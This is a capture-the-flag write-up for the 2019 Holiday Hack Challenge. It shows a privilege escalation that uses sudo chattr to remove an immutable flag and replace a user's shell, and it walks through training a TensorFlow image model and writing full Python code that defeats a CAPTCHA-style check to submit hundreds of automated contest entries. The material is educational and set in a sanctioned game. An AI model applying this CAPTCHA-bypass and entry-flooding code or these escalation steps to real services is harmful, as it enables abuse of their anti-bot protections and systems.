Objective

image-20200102172112619

Link: https://fridosleigh.com/

Narrative

Krampus continues after I find him in the steam tunnels:

But, before I can tell you more, I need to know that I can trust you.

Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I’ll know I can trust you.

The contest is here on my screen and at fridosleigh.com.

No purchase necessary, enter as often as you want, so I am!

They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs.

Unfortunately, it’s restricted to elves only, and I can’t bypass the CAPTEHA.

(That’s Completely Automated Public Turing test to tell Elves and Humans Apart.)

I’ve already cataloged 12,000 images and decoded the API interface.

Can you help me bypass the CAPTEHA and submit lots of entries?

Terminal - Nyanshell

Challenge

Going out of the tunnels, out of the dorm, across the quad to Hermey Hall, and into the Speaker Unpreparedness Room, I find Alabaster:

image-20200102114908334

Welcome to the Speaker UNpreparedness Room!

My name’s Alabaster Snowball and I could use a hand.

I’m trying to log into this terminal, but something’s gone horribly wrong.

Every time I try to log in, I get accosted with … a hatted cat and a toaster pastry?

I thought my shell was Bash, not flying feline.

When I try to overwrite it with something else, I get permission errors.

Have you heard any chatter about immutable files? And what is sudo -l telling me?

Going into the terminal, I’m greeted with a challenge:

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄░░░░░░░░░
░░░░░░░░▄▀░░░░░░░░░░░░▄░░░░░░░▀▄░░░░░░░
░░░░░░░░█░░▄░░░░▄░░░░░░░░░░░░░░█░░░░░░░
░░░░░░░░█░░░░░░░░░░░░▄█▄▄░░▄░░░█░▄▄▄░░░
░▄▄▄▄▄░░█░░░░░░▀░░░░▀█░░▀▄░░░░░█▀▀░██░░
░██▄▀██▄█░░░▄░░░░░░░██░░░░▀▀▀▀▀░░░░██░░
░░▀██▄▀██░░░░░░░░▀░██▀░░░░░░░░░░░░░▀██░
░░░░▀████░▀░░░░▄░░░██░░░▄█░░░░▄░▄█░░██░
░░░░░░░▀█░░░░▄░░░░░██░░░░▄░░░▄░░▄░░░██░
░░░░░░░▄█▄░░░░░░░░░░░▀▄░░▀▀▀▀▀▀▀▀░░▄▀░░
░░░░░░█▀▀█████████▀▀▀▀████████████▀░░░░
░░░░░░████▀░░███▀░░░░░░▀███░░▀██▀░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
nyancat, nyancat
I love that nyancat!
My shell's stuffed inside one
Whatcha' think about that?
Sadly now, the day's gone
Things to do!  Without one...
I'll miss that nyancat
Run commands, win, and done!
Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt.
Target Credentials:
username: alabaster_snowball
password: Password2
elf@5ba094121628:~$

Solution

The goal here is to get a bash shell as Alabaster, and I have his username and password. I’ll start with su alabaster_snowball. I’m prompted for a password, and when I enter it, an animated Nyan Cat takes over the terminal.

It runs until I Ctrl+c to kill it. That must be the hatted cat and toaster pastry Alabaster was talking about: Nyan Cat is a 2011 internet meme featuring a cat with a Pop-Tart torso flying through space trailing a rainbow.

I’ll check the /etc/passwd file for alabaster and see his shell is set to /bin/nsh:

elf@59882697f2a5:~$ grep alabaster /etc/passwd
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh

I don’t have permission to change /etc/passwd:

elf@cd8ee16e5895:~$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1029 Dec 11 17:40 /etc/passwd

If I run ls -l on /bin/nsh, I’ll see it is owned by root, but world writable:

elf@59882697f2a5:~$ ls -l /bin/nsh
-rwxrwxrwx 1 root root 75680 Dec 11 17:40 /bin/nsh

And yet, if I try to overwrite it, it fails:

elf@59882697f2a5:~$ cp /bin/bash /bin/nsh
cp: cannot create regular file '/bin/nsh': Operation not permitted

Alabaster also mentioned to check sudo -l:

elf@59882697f2a5:~$ sudo -l
Matching Defaults entries for elf on 59882697f2a5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elf may run the following commands on 59882697f2a5:
    (root) NOPASSWD: /usr/bin/chattr

This tells me that I can run /usr/bin/chattr as root without a password.

chattr is the utility to change file attributes on a Linux system. ls -l will show read (r), write (w), and execute (x), but there are actually more attributes. The man page for chattr lists them:

The letters ‘acdeijstuADST’ select the new attributes for the files: append only (a), compressed (c), no dump (d), extent format (e), immutable (i), data journalling (j), secure deletion (s), no tail-merging (t), undeletable (u), no atime updates (A), synchronous directory updates (D), synchronous updates (S), and top of directory hierarchy (T).

The following attributes are read-only, and may be listed by lsattr but not modified by chattr: huge file (h), compression error (E), indexed directory (I), compression raw access (X), and compressed dirty file (Z).

I’ll run lsattr on /bin/nsh, and see the i for immutable is set (as well as the e for extent format):

elf@c8ae3e046f7f:~$ lsattr /bin/nsh 
----i---------e---- /bin/nsh

That’s what’s preventing the copy. I can try to clear the flag as elf, but elf doesn’t have permission:

elf@c8ae3e046f7f:~$ chattr -i /bin/nsh 
chattr: Permission denied while setting flags on /bin/nsh

But, I know I can run it as root with sudo and no password:

elf@c8ae3e046f7f:~$ sudo /usr/bin/chattr -i /bin/nsh 
elf@c8ae3e046f7f:~$ lsattr /bin/nsh 
--------------e---- /bin/nsh

Now the copy runs without issue:

elf@c8ae3e046f7f:~$ cp /bin/bash /bin/nsh 

I’ll su to Alabaster again, and it works:

elf@c8ae3e046f7f:~$ su alabaster_snowball
Password: 
Loading, please wait......
You did it! Congratulations!
alabaster_snowball@c8ae3e046f7f:/home/elf$

Hints

On solving, Alabaster directs me to look at the KringleCon talks for one about using machine learning to bypass the CAPTEHA:

Who would do such a thing?? Well, it IS a good looking cat.

Have you heard about the Frido Sleigh contest?

There are some serious prizes up for grabs.

The contest is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter.

I heard there was a talk at KCII about using machine learning to defeat challenges like this.

I don’t think anything could ever beat an elf though!

Objective Challenge

Enumeration

Visiting the site presents a form:

image-20200102174606185

Clicking on the “I’m not human” button pops up a window with images and a five-second timer:

image-20200102174637797

It’s impossible to click on all the correct images in five seconds, so I need to automate this.

TensorFlow Model

In his 2019 KringleCon talk, Machine Learning Use Cases for Cybersecurity, Chris Davis gives a demo and some sample code to create a machine learning model from images of apples and bananas. I can use this same code to train on the 12,000 images Krampus gave me. After making sure all the prerequisites were installed, I decompressed the training data into a folder, training_set:

$ ls training_set/
'Candy Canes'  'Christmas Trees'   Ornaments   Presents  'Santa Hats'   Stockings

Now I ran retrain.py:

$ python3 retrain.py --image_dir training_set/

It ran for about 30 minutes. When it was done, I wanted to give it a test run, so I clicked through the CAPTEHA a few times and downloaded a few images, naming them after their contents:

$ ls unknown_images/
candycane.png  hat1.png  hat.png  ornament.png  present.png  stocking.png

Then I ran the model against it:

$ python3 predict_images_using_trained_model.py 
Processing Image unknown_images/stocking.png
Processing Image unknown_images/ornament.png
Processing Image unknown_images/candycane.png
Processing Image unknown_images/present.png
Processing Image unknown_images/hat1.png
Processing Image unknown_images/hat.png
Waiting For Threads to Finish...
TensorFlow Predicted unknown_images/candycane.png is a Candy Canes with 99.30% Accuracy
TensorFlow Predicted unknown_images/present.png is a Presents with 99.96% Accuracy
TensorFlow Predicted unknown_images/hat1.png is a Santa Hats with 99.99% Accuracy
TensorFlow Predicted unknown_images/hat.png is a Santa Hats with 99.88% Accuracy
TensorFlow Predicted unknown_images/stocking.png is a Stockings with 99.91% Accuracy
TensorFlow Predicted unknown_images/ornament.png is a Ornaments with 90.08% Accuracy

That seems to be working well!

API

Krampus also gave me a skeleton program to interact with the API:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys

def main():
    yourREALemailAddress = "YourRealEmail@SomeRealEmailDomain.RealTLD"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    '''
    MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join( [ img['uuid'] for img in b64_images ] )

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

This is worth taking a minute to understand. It uses requests to issue a GET request to https://fridosleigh.com/api/capteha/request. The response is parsed as JSON into json_resp. I can take a look at the format in the Python interpreter:

$ python3
Python 3.6.9 (default, Nov  7 2019, 10:44:02) 
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> import json
>>> import sys
>>> s = requests.Session()
>>> url = "https://fridosleigh.com/"
>>> json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
>>> json_resp.keys()    
dict_keys(['images', 'request', 'select_type'])

request is True, and select_type names the image categories I should click on:

>>> json_resp['request']
True
>>> json_resp['select_type']
'Candy Canes, Christmas Trees, and Santa Hats'
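The skeleton cleans that string into a list of three category names by splitting on commas and stripping the “ and ” from the last piece. A quick sanity check of that logic, using the select_type value above:

```python
# Reproduce the skeleton's select_type cleanup on the sample value above
select_type = 'Candy Canes, Christmas Trees, and Santa Hats'

parts = select_type.split(',')
types = [parts[0].strip(),
         parts[1].strip(),
         parts[2].replace(' and ', '').strip()]

print(types)  # → ['Candy Canes', 'Christmas Trees', 'Santa Hats']
```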

images is a list of 100 images (making up the 10x10 grid). Each item has a uuid and a base64 field, where base64 holds the base64-encoded bytes of the image itself:

>>> len(json_resp['images'])
100
>>> json_resp['images'][0].keys()
dict_keys(['base64', 'uuid'])
>>> json_resp['images'][0]['uuid']
'b60bf4bc-e584-11e9-97c1-309c23aaf0ac'
>>> json_resp['images'][0]['base64'][:50]
'iVBORw0KGgoAAAANSUhEUgAAAHgAAAB4CAYAAAA5ZDbSAAAABG'
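That iVBOR… prefix is the telltale base64 encoding of a PNG header; decoding it confirms each base64 field is a raw PNG image:

```python
import base64

# The first 12 base64 characters of every image decode to the 8-byte PNG signature
assert base64.b64decode('iVBORw0KGgo=') == b'\x89PNG\r\n\x1a\n'
```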

Now, I’m supposed to do some processing and end up with a comma-separated list of the UUIDs whose images match the types in select_type. The script POSTs that data to /api/capteha/submit and checks the result. On failure, it prints an error message and exits. On success, it goes on to submit contest entries until the response contains my email address (meaning I’ve won) or it hits 200 attempts.

New Code

The example code from GitHub loops through all the images in a directory, classifies them, and prints the results to the screen. I want to change that into a function that takes a list of images (UUIDs and base64-encoded bytes), processes them, and returns a dictionary where the keys are UUIDs and the values are each image’s predicted category.

I created a copy of the example file, but renamed main to process_capteha(images). I made changes to the function so that it would loop over the images, passing each one to the predict_image function, and at the end, return a dictionary as desired. I made a minor change to predict_image, changing the image_full_path variable to uuid. The final code, capteha_ident.py, looks like:

#!/usr/bin/python3
# Image Recognition Using Tensorflow Example.
# Code based on example at:
# https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/label_image/label_image.py
import base64
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys


def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, uuid, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'uuid':uuid, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

def process_capteha(images):
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_set directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to speed up the processing
    q = queue.Queue()

    #Going to iterate over each of our images.
    for image in images:
        uuid = image['uuid']

        sys.stdout.write(f'\rProcessing Image {uuid}')
        sys.stdout.flush()
        # We don't want to process too many images at once
        while len(threading.enumerate()) > 20:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes, so base64-decode the image into a bytes object
        image_bytes = base64.b64decode(image['base64'])
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, uuid, labels, input_operation, output_operation)).start()

    print('\r[*] Waiting For Threads to Finish...')
    while q.qsize() < len(images):
        time.sleep(0.001)

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    #do something with our results... Like print them to the screen.
    predictions = {}
    for prediction in prediction_results:
        #print('TensorFlow Predicted {uuid} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))
        predictions[prediction['uuid']] = prediction['prediction']
    return predictions
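One detail that makes the matching work: retrain.py writes its label file in lowercase (e.g. candy canes), while the CAPTEHA’s select_type uses capitalized names, which is presumably why predict_image calls .title() on each label before returning it. A quick check:

```python
# retrain.py's output_labels.txt holds lowercased category names;
# str.title() restores the capitalization used by select_type
assert 'candy canes'.title() == 'Candy Canes'
assert 'christmas trees'.title() == 'Christmas Trees'
```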

Now, I’ll import this at the top of the code I got from Krampus:

import capteha_ident

Then, I’ll generate final_answer:

    results = capteha_ident.process_capteha(json_resp['images'])
    final_answer = ','.join([uuid for uuid in results if results[uuid] in challenge_image_types])
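To sanity-check that filter, here is a toy run with made-up UUIDs and predictions (hypothetical values, purely for illustration):

```python
# Hypothetical model output: uuid -> predicted category
results = {'uuid-1': 'Candy Canes',
           'uuid-2': 'Ornaments',
           'uuid-3': 'Santa Hats'}
challenge_image_types = ['Candy Canes', 'Christmas Trees', 'Santa Hats']

# Keep only the UUIDs whose prediction is one of the requested types
final_answer = ','.join(uuid for uuid in results
                        if results[uuid] in challenge_image_types)
print(final_answer)  # → uuid-1,uuid-3
```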

The rest of the code stays the same, except I modified some of the prints to look nicer:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import capteha_ident


def main():
    yourREALemailAddress = '[redacted]'

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    results = capteha_ident.process_capteha(json_resp['images'])
    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join([uuid for uuid in results if results[uuid] in challenge_image_types])

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('[+] CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        sys.stdout.write('\rSubmitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        sys.stdout.flush()
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(f'\n[+]{entry_response}')


if __name__ == "__main__":
    main()

When it runs, it succeeds in entering enough times to win.

An email then arrives with a code to enter into my badge:

image-20200102201632147

Narrative

Talking to Krampus again, he’s happy:

You did it! Thank you so much. I can trust you!

To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels.

I also now have access to the Steam Tunnels network, letting me teleport via my badge to select places across campus:

image-20200112060122521